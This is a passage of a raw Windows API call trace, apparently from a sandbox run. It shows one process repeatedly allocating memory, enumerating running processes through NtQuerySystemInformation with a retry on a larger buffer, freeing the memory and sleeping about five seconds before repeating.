RegionSize=0xdea68*=0x10000) returned 0x0 [0248.202] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0248.203] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0248.203] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0248.204] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0248.208] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0248.209] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0248.349] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0248.350] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0248.351] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0248.351] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0248.351] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0248.356] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0248.357] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0248.359] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0248.359] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0248.360] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0248.360] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0248.361] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0248.366] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0248.367] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0248.369] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0248.369] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0248.370] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0248.370] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0248.370] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0248.376] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0248.377] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0248.379] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0248.379] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0248.380] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0248.382] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0248.383] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0248.386] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0248.387] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0248.388] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0248.389] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0248.390] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0248.390] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0248.391] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0248.395] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0248.396] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0248.398] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0248.398] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0248.399] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0248.399] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0248.400] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0248.404] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0248.405] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0248.407] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0248.407] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0248.408] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0248.408] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0248.409] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0248.413] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0248.414] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0248.416] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0248.416] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0248.417] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0248.417] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0248.417] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0248.422] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0248.422] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0248.424] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0248.424] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0248.425] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0248.426] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0248.426] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0248.431] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0248.432] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0248.433] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0248.434] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0248.434] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0248.435] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0248.435] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0248.441] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0248.442] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0248.444] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0248.444] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0248.445] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0248.445] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0248.445] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0248.450] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0248.451] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0248.452] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0248.452] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0248.453] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0248.453] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0248.454] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0248.458] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0248.459] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0248.460] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0248.461] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0248.462] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0248.462] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0248.462] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0248.466] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0248.467] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0248.468] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0248.469] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0248.470] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0248.470] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0248.470] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0248.475] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0248.476] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0248.477] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0248.477] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0248.478] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0248.479] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0248.479] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0248.484] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0248.547] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0248.548] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0248.548] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0248.550] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0248.550] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0248.550] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0248.556] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0248.557] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0248.559] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0248.559] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0248.560] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0248.561] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0248.561] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0248.566] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0248.567] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0248.569] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0248.569] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0248.570] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0248.571] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0248.571] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0248.576] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0248.577] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0248.579] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0248.579] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0248.580] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0248.580] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0248.581] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0248.586] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0248.587] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0248.589] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0248.589] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0248.590] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0248.590] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0248.591] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0248.595] NtFreeVirtualMemory (ProcessHandle=0xffffffff, 